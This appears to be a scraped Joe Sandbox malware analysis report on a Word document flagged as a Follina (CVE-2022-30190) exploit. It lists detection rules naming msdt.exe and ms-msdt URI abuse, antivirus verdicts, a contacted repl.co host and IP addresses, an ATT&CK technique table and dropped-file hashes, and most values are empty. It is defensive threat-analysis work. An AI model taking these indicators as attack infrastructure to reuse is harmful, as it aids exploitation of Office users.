Windows
Analysis Report
C1ZGt61uGv
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 2960 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak |
| |
INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
Click to see the 7 entries |
Timestamp: | 35.186.245.55192.168.2.22443491762025010 08/18/22-04:23:24.931708 |
SID: | 2025010 |
Source Port: | 443 |
Destination Port: | 49176 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 35.186.245.55192.168.2.22443491812025010 08/18/22-04:23:28.806682 |
SID: | 2025010 |
Source Port: | 443 |
Destination Port: | 49181 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Extracted files from sample: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | Virustotal: | ||
Source: | Metadefender: | ||
Source: | ReversingLabs: |
Source: | Key opened: | Jump to behavior |
Source: | LNK file: |
Source: | OLE indicator, Word Document stream: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Persistence and Installation Behavior |
---|
Source: | Extracted files from sample: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 13 Exploitation for Client Execution | Path Interception | Path Interception | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 2 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 14 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
46% | Virustotal | Browse | ||
26% | Metadefender | Browse | ||
35% | ReversingLabs | Document-Word.Trojan.Minerva | ||
100% | Avira | W97M/Dldr.Agent.G1 |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira | JS/CVE-2022-30190.G | ||
100% | Avira | JS/CVE-2022-30190.G | ||
100% | Avira | JS/CVE-2022-30190.G | ||
100% | Avira | JS/CVE-2022-30190.G |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
dullghostwhitetwintext.karewen.repl.co | 35.186.245.55 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
35.186.245.55 | dullghostwhitetwintext.karewen.repl.co | United States | 15169 | GOOGLEUS | false | |
34.149.204.188 | unknown | United States | 2686 | ATGS-MMD-ASUS | false |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 686026 |
Start date and time: | 2022-08-18 04:22:09 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 9s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | C1ZGt61uGv (renamed file extension from none to docx) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.expl.evad.winDOCX@1/20@7/2 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ATGS-MMD-ASUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
05af1f5ca1b87cc9cc9b25185115607d | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.28773612475316834 |
Encrypted: | false |
SSDEEP: | 24:I3yC/9LC4tB37+KqorUSjnClWnyc8v5TbT/tAZvzKxFcNTRxlQvnS8S9XqJNQSEQ:I35RBzAccmKyTjlJQaxwOr0JZH |
MD5: | FF3458BF59CAB2B33042A43FE7571C5E |
SHA1: | B8B002E94BF658303BE1DA5E7D5FA7670EA882B7 |
SHA-256: | E151CF032E1294178D66CF5D065FD8F0C26D27945195FD34738910D25B6A567D |
SHA-512: | 256C055110B1AA138F19FC4519D05FE158FBCEF88C8E604DECE24FF2AAB6808208E9DED419613436E08DB2429124F131F2E5F81FCDFC3C9C0E1CE1240F0EC212 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{82D6D04A-E2A7-42F1-89A6-CFD57F9EC766}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6745976468464878 |
Encrypted: | false |
SSDEEP: | 768:T5K146vqOVHUvJBmtlK2DrxtlK2DrwZPJl/XDr/klmDr/4xtD+DrbtDlDr:Lhw |
MD5: | 9F01FC48E22641773BC5DB74B89EB0E1 |
SHA1: | B4985AF395531C350958A267B7D81F78AABA57A2 |
SHA-256: | 0E19C09DC2C68235B7C39C13A81A3125C376D9135267CB003B1057285581374B |
SHA-512: | BCA4CA34F6F4DCF49EF55B53FF8C9F1452BCE4A6426B083FC7AFA578CD88C07635E12844AA63319E5CC21128EB2F7FCD1066FD7DAE453A1720333FA41445A9E2 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.936756154878342 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzXh4NaPlDpKQclkrI8TcOhFYDZ276:yPblzXeWl0J+c8QGFYDZ22 |
MD5: | 508E494841A8C3839E148679A4937283 |
SHA1: | 668677B7DBA2DBD40A596A200D0176B965BD44AE |
SHA-256: | AB0AE8DEF878D06C5F65D16C14B4ACBEE7EED1666584865D90C62E5704B5B48A |
SHA-512: | DABFFDCCE773E059F52E137EAE54621AE36E33CB28A5A6A86CC5E323D23A8ACDB3B8B76CB74CC9BFDFC8586A0D2BF553FE63C40F5B1D3CCB197A6721E1ED644A |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.28745721354451365 |
Encrypted: | false |
SSDEEP: | 48:I3sPRBffmW1AEr12ORQopWi3hI9ahlrq1/Tp9oipEGQO09oipEGQOyH:KoLXYErFHI9aXq1DmbBmbvH |
MD5: | 5F39A4DAC8039EB065DD8D063640BC4F |
SHA1: | BBEA611DA4F133FB3F02C273B60D379060ECC49C |
SHA-256: | FA8BE565755B84D32FF994D075AF5002629176DA9771B5CC9C78268C0021BACC |
SHA-512: | 5B983F376F0146604DA61EBED288E016E4DD43EA1A8971D3953DBC8D1B52B5BD22D88B32628A61EC06C784B14AC2B0A5F65AC8B128F3D84422861B0BE9BFBC2D |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{ECAF6FF3-F9CF-495B-80DB-8035DEA309E7}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22075992709284928 |
Encrypted: | false |
SSDEEP: | 48:I3oyQUrB/2aWIeFRmHaaGEW1+7DYd7z1IZuxTV/ZjA/iZjA/J:KoLCjuRQG7ZYuxT/AmAx |
MD5: | B53D2E2D585B0857AAFF3A807DDDFE73 |
SHA1: | 309EB90AD24B5FC926D00B6B16A2DE199522114E |
SHA-256: | EE3835D8BE77FC46EB661A14ADCC3285582CC8774C8F2617922D99D5A13C29CE |
SHA-512: | C8ACE3F93133C5F4C8E257D311DE4F182144F4871EDA19A18DD83BB0E05A433FA37F4440F8DA50C283FD720D6F4860B601B56F91D3C95BF56186674C8DBAE769 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.92634307586349 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlz2rZjMWjjic+lIHdhHAWelOVG4R7276:yPblzwWDc19SWzk4t22 |
